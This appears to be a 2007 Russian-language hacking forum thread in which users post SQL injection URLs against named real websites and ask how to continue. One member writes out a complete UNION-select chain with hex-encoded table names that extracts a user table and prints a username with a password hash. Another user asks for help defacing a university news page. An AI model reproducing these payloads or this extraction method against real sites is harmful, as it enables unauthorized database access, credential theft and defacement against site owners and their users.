
27.11.2007, 17:19
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами:
9763159
Репутация:
19
|
|
[aywo]
А там вообще чего есть?
|
|
|

27.11.2007, 17:45
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами:
10143707
Репутация:
114
|
|
2YaNeLam что ты имеешь ввиду?
|
|
|

27.11.2007, 22:21
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами:
9763159
Репутация:
19
|
|
ну там вообще на Ipb 1.3 патченом есть Sql?
|
|
|

27.11.2007, 22:24
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами:
10143707
Репутация:
114
|
|
тебе сюда _https://forum.antichat.ru/thread15678.html
|
|
|

28.11.2007, 16:49
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables/*
что дальше делать не подскажите?
|
|
|

28.11.2007, 17:07
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Сообщение от Mike 007
что дальше делать не подскажите?
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat(table_schema,0x3a,table_name),4,5+from+information_schema.columns+where+column_name=0x70617373776F7264+--+
progettocompetence_it:areariservata_utenti
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_schema=0x70726F676574746F636F6D706574656E63655F6974+and+table_name=0x617265617269736572766174615F7574656E7469+limit+1,1+--+
id
userid
password
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,id,userid,password),4,5+from+progettocompetence_it.areariservata_utenti+limit+0,1+--+
1:Ilic:ff112557a3a0a4d1e74f56e0ac979467
Крути limit ....
|
|
|

30.11.2007, 04:43
|
|
Новичок
Регистрация: 28.11.2007
Сообщений: 5
С нами:
9712206
Репутация:
0
|
|
Код:
http://www.millikin.edu/athletics/archives_sport.asp?SPORT=6%20and%201=1%20UNION+SELECT+1,2,3,NULL+FROM%20INFORMATION_SCHEMA.TABLES%20--
Исключительно в образовательных целях хотелось бы изменить вот эту страничку
Код:
http://www.millikin.edu/media/print_release.asp?NEWS_ID=1227
имена таблиц похоже только методом тыка.. через ; пробовал менять таблицу news - толку 0...
|
|
|

28.11.2007, 21:00
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
Код:
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/*
а тут что делать?
|
|
|

28.11.2007, 21:09
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Сообщение от Mike 007
Код:
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/*
а тут что делать?
Аналогично вышеизложенному.
|
|
|

28.11.2007, 21:45
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
а +where+co lumn_name= 0x70617373776F7264+--+ откуда?
и
Код:
+where+table_schema=0x70726F676574 746F636F6D706574656E63655F6974+and+table_name=0x61 7265617269736572766174615F7574656E7469+limit+1,1+--+
откуда взяось?
Последний раз редактировалось Mike 007; 28.11.2007 в 21:54..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|